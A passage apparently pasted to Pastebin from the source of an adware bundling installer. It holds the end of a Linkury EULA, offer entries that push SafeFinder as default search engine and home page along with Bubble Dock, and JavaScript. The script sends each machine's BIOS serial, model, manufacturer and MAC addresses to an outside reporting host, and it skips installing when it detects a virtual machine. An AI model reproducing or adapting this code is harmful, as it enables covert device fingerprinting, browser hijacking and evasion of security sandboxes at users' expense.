unauthorized use may also violate applicable laws including copyright and trademark laws and applicable communications regulations and statutes. Unless explicitly stated herein, nothing in this Agreement shall be construed as conferring any license to intellectual property rights, whether by estoppel, implication or otherwise. The license granted hereunder is revocable by Linkury at any time without notice and with or without cause.<br\/>\n<br\/>\nUser agrees that all of Linkury`s trademarks, trade names, service marks and other Linkury logos and brand features, and product and service names are trademarks and the property of Linkury Ltd. (the \"Linkury Marks\"). Without Linkury's prior written permission, You agree not to display or use in any manner the Linkury Marks.<br\/>\n<br\/>\nLicense to Use<br\/>\n<br\/>\nLinkury grants to User a personal, worldwide, royalty-free, non-assignable and non-exclusive license to use the software forming part of the Linkury Services, if any, provided by Linkury as part of the Linkury Services (\"Software\"). This license is for the sole purpose of enabling User to use and enjoy the benefit of the Linkury Services as provided by Linkury, in the manner permitted by this Agreement and subject to any applicable law.<br\/>\nUser agrees not to (and not to permit anyone else to) copy, modify, create a derivative work of, reverse engineer, decompile or otherwise attempt to extract the source code of the Software or any part thereof, unless this is expressly permitted or required by law, or unless the user has been authorized by Linkury in writing.<br\/>\nUser may not assign (or grant a sub-licence of) its rights to use the Software, grant a security interest in or over User's rights to use the Software, or otherwise transfer any part of its rights to use the Software.<br\/>\nTermination<br\/>\n<br\/>\nThe terms of the Agreement will continue to apply until terminated by Linkury, as contemplated herein.<br\/>\nYou agree that Linkury may, without any prior notice, immediately terminate, limit your access to or suspend your Linkury account, and\/or access to the Linkury Services, at its sole discretion, with no need to explain the cause for such termination. Further, You agree that Linkury shall not be liable to You or any third party for any termination of your account or access to the Linkury`s Services.<br\/>\nUpon termination, all of the legal rights, obligations and liabilities that have accrued to User and Linkury which are expressed, contemplated or by their nature must continue indefinitely, shall be unaffected by this termination.<br\/>\nExclusion Of Warranties and Limitations of Liability<br\/>\n<br\/>\nUSER EXPRESSLY UNDERSTANDS AND AGREES THAT ITS USE OF THE Linkury SERVICES IS AT ITS SOLE RISK AND THAT THE SERVICES ARE PROVIDED ON AN \"AS IS\" AND 'AS AVAILABLE \" BASIS.<br\/>\n<br\/>\nANY MATERIAL DOWNLOADED OR OTHERWISE OBTAINED THROUGH THE USE OF THE Linkury SERVICES IS DONE AT USER'S DISCRETION AND RISK AND USER WILL BE SOLELY RESPONSIBLE FOR ANY DAMAGE TO ITS COMPUTER SYSTEM OR OTHER DEVICE OR LOSS OF DATA THAT RESULTS FROM THE DOWNLOAD OF ANY SUCH MATERIAL.<br\/>\n<br\/>\nNO ADVICE OR INFORMATION, WHETHER ORAL OR WRITTEN, OBTAINED BY USER FROM Linkury OR THROUGH OR FROM THE Linkury SERVICES SHALL CREATE ANY WARRANTY NOT EXPRESSLY STATED IN THIS AGREEMENT.<br\/>\nLinkury FURTHER EXPRESSLY DISCLAIMS ALL WARRANTIES AND CONDITIONS OF ANY KIND, WHETHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO THE IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT OF THE Linkury SERVICES.<br\/>\nIN PARTICULAR, Linkury, ITS AFFILIATES, AND ITS LICENSORS DO NOT REPRESENT OR WARRANT TO USER THAT:<br\/>\n(i) USE OF THE Linkury SERVICES WILL MEET ANY USER'S REQUIREMENTS,<br\/>\n(ii) USE OF THE Linkury SERVICES WILL BE UNINTERRUPTED, TIMELY, SECURE OR FREE FROM ERROR.<br\/>\n(iii) ANY INFORMATION OBTAINED BY USER AS A RESULT OF ITS USE OF THE Linkury SERVICES WILL BE ACCURATE OR RELIABLE, OR<br\/>\n(iv) THAT DEFECTS IN THE OPERATION OR FUNCTIONALITY OF ANY SOFTWARE PROVIDED TO USER AS PART OF THE Linkury SERVICES WILL BE CORRECTED.<br\/>\nIN NO EVENT WILL Linkury OR ITS DIRECTORS, EMPLOYEES OR AGENTS BE LIABLE TO USER OR ANY THIRD PERSON FOR ANY INDIRECT, CONSEQUENTIAL, EXEMPLARY, INCIDENTAL, SPECIAL OR PUNITIVE DAMAGES, INCLUDING FOR ANY LOST PROFITS OR LOST DATA ARISING FROM USER'S USE OF SOFTWARE, THE Linkury SERVICE, ANY PLATFORM APPLICATIONS OR ANY OF WEB BASED INTERFACE CONTENT OR OTHER MATERIALS ON, ACCESSED THROUGH OR DOWNLOADED USING THE Linkury SERVICES, EVEN IF Linkury IS AWARE OR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. NOTWITHSTANDING ANYTHING TO THE CONTRARY CONTAINED HEREIN, Linkury'S LIABILITY TO USER FOR ANY CAUSE WHATSOEVER, AND REGARDLESS OF THE FORM OF THE ACTION, WILL AT ALL TIMES BE LIMITED TO THE AMOUNT PAID, IF ANY, BY USER TO Linkury FOR THE Linkury SERVICE DURING THE TERM, BUT IN NO CASE WILL THE Linkury'S LIABILITY TO THE USER EXCEED $200. USER ACKNOWLEDGES THAT IF NO FEES ARE PAID BY IT TO Linkury FOR THE SERVICE, USER SHALL NOT BE ENTITLED TO DAMAGES OF ANY KIND FROM Linkury, REGARDLESS OF THE CAUSE OF ACTION.<br\/>\nWITHOUT DEROGATING FROM THE PROVISION IN THIS SECTION 7 ABOVE, USER EXPRESSLY UNDERSTANDS AND AGREES THAT Linkury, ITS AFFILIATES, AND ITS LICENSORS SHALL NOT BE LIABLE TO USER FOR ANY LOSS OR DAMAGE WHICH MAY BE INCURRED BY IT AS A RESULT OF: (i) ANY CHANGES WHICH Linkury MAY MAKE TO THE Linkury SERVICES, OR FOR ANY PERMANENT OR TEMPORARY CESSATION IN THE PROVISION OF THE Linkury SERVICES, OR ANY PART THEREOF OT FEATURES WITHIN THE Linkury SERVICES; (ii) THE DELETION OF, CORRUPTION OF, OR FAILURE TO STORE, ANY CONTENT AND OTHER COMMUNICATIONS DATA MAINTAINED OR TRANSMITTED BY OR THROUGH ITS USE OF THE Linkury SERVICES; (iii) USER'S FAILURE TO KEEP ITS PASSWORD OR ACCOUNT DETAILS SECURE AND CONFIDENTIAL. IF AND TO THE EXTENT THAT ANY LIMITION OF Linkury'S WARRANTY OR LIABILITY IS EXCLUDED OR LIMITED BY APPLICABLE LAW, ONLY THE LIMITATIONS WHICH ARE LAWFUL IN THE USER'S JURISDICTION WILL APPLY TO THE USER AND Linkury LIABILITY WILL BE LIMITED TO THE MAXIMUM EXTENT PERMITTED BY SUCH APPLICABLE LAW.<br\/>\nPrivacy and Personal Information<br\/>\n<br\/>\nInformation on Linkury's personal information protection polices and practice can be found at the Linkury website, www.Linkury.com. The User agrees that these policies apply to this Agreement and are incorporated herein as an integral part thereof, the provision of Linkury Services and the information User provides through use of the Linkury Services.<br\/>\nUser understands that through your use of the Linkury Services it consents to the collection and use (as set forth in the applicable privacy policy) of certain personal information.<br\/>\nIndemnification<br\/>\n<br\/>\nUser agrees to indemnify, defend and hold Linkury and its directors, officers, employees, agents and contractors harmless from and against any and all claims, damages, losses, costs (including without limitation reasonable attorneys' fees) or other expenses that arise directly or indirectly out of or from (i) User's breach of any provision of this Agreement; or (ii) User's activities in connection with the Linkury Services.<br\/>\nGeneral<br\/>\n<br\/>\nThis Agreement contains the complete agreement concerning the access, use and provision of the Linkury Services between the parties and shall, as of the date hereof, supersede all other agreements or arrangements between the parties with regard to the subject matter hereof.<br\/>\nThis Agreement shall be binding upon and inure to the benefit of the parties hereto and their respective heirs, legal representatives, successors and assigns.<br\/>\nNo waiver or modification of this Agreement or of any covenant, condition, or limitation herein contained shall be valid unless in writing and duly executed by the party to be charged therewith and no evidence of any waiver or modification shall be offered or received in evidence of any proceeding, arbitration, or litigation between the parties hereto arising out of or affecting this Agreement, or the rights or obligations of the parties hereunder, unless such waiver or modification is in writing, duly executed as aforesaid.<br\/>\nThe failure of Linkury to exercise or enforce any right or provision of the Agreement shall not constitute a waiver of such right or provision.<br\/>\nUser agrees that regardless of any statute or law to the contrary, any claim or cause of action arising out of or related to use of the Linkury Services or this Agreement must be filed within one (1) year after such claim or cause of action arose or be forever barred<br\/>\nAll agreements and covenants contained herein are severable. If any provision of the Agreement is found by a court of competent jurisdiction to be invalid, the parties nevertheless agree that the court should endeavor to give effect to the parties' intentions as reflected in the provision, and the other provisions of the Agreement remain in full force and effect<br\/>\nThe captions and headings in this Agreement, have been inserted for convenience only and shall not be deemed to limit or otherwise affect any of the provisions of this Agreement.<br\/>\nIt is the intention of the parties hereto that this Agreement and the performance hereunder be construed in accordance with, under and pursuant to the laws of the State of Israel without regard to the jurisdiction in which any action or special proceeding may be instituted.<\/div>\n<div style=\"font-size:11px;\">\nIn the age of too much information, SafeFinder presents the perfect tool. Click \"Next\" now to continue and install SafeFinder, set SafeFinder as my default search provider and set SafeFinder as my home page and new tab in my browsers. Simplify the web, SafeFinder gives you the optimal way to share, search, work & play.\n<\/div>\n<div style=\"position:absolute;bottom:60px;right:0;width:380px;height:30px;font-size:9px;\">By clicking Next, I agree to the SafeFinder <a href=\"http:\/\/goo.gl\/do8ooC\" target=\"_blank\" style=\"font-size:9px;\">Terms of Use<\/a> and <a href=\"http:\/\/goo.gl\/ZqeWis\" target=\"_blank\" style=\"font-size:9px;\">Privacy Policy<\/a>. For uninstall instructions, <a href=\"http:\/\/goo.gl\/lX8SEZ\" target=\"_blank\" style=\"font-size:9px;\">click here<\/a>.<\/div>\n\n<\/div>","url":"http:\/\/install.bhuygv.com\/download\/APSFInsTerra","params":"{\"packer\":{\"DistributerName\":\"APSFInsTerra\",\"ChannelId\":\"6\"},\"Agent\":{\"SetAll\":\"true\"}}","post_reg":["1193"],"rate_value":0.014,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":102,"display":"list","title":"Bubble Dock","eula":"http:\/\/goo.gl\/lUqz0O","description":"Customize your desktop thanks to Bubble Dock. Find all your favourite content on your PC. By clicking on Next you accept <a href=\"http:\/\/goo.gl\/lUqz0O\" target=\"_blank\">the legal terms<\/a> of Bubble Dock.","url":"http:\/\/www.bubbledock.us\/aff\/1005000101510004\/dld","params":"","post_reg":["1088","1089","1090"],"rate_value":0.010925,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}}];
  475.             showScreens(screenId);
  476.             api.show();
  477.             // Report initiated install and save tracking details
  478.             api.getSysInfo(function(systemInfo) {
  479.                 var systemInfo = JSON.parse(systemInfo);
  480.                 var allMac='';
  481.                 for (var i=0;i<systemInfo.mac.length;i++) {
  482.                     if (typeof systemInfo.mac[i].mac !== 'undefined')
  483.                         allMac+=systemInfo.mac[i].mac;
  484.                 }
  485.                
  486.                 api.download(JSON.stringify({ url: "http://set.downor3.space/report.php?typ=sys&affId="+info.affiliateId+"&instId="+info.installerId+"&ho_transId="+info.transactionId+"&transId=44448318&chk_s_b="+systemInfo.bios.serial+"&chk_s_v="+systemInfo.bios.version+"&chk_c_ma="+systemInfo.computer.manufacturer+"&chk_c_mo="+systemInfo.computer.model+"&chk_mac="+allMac+"&randid="+ Math.random(), file: "dlreport", read:true }), function () {
  487.                 });
  488.                
  489.                 // Avoid bad machines!
  490.                 if (systemInfo.computer.model == "Google" || systemInfo.computer.model.indexOf("Virtual") > -1) {
  491.                     var installApi = JSON.parse(api.info);
  492.                     var input = [];
  493.                     var callback = function (isDownload, index) {
  494.                         if (isDownload || index < input.length) return;
  495.                         h.cancel();
  496.                     };
  497.                     h.installOffers(input, installApi, callback);
  498.                 }
  499.            });
  500.         } catch (e) {
  501.             alert("Error: " + e.message);
  502.             h.cancel();
  503.    </script>
  504. </body>
  505. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement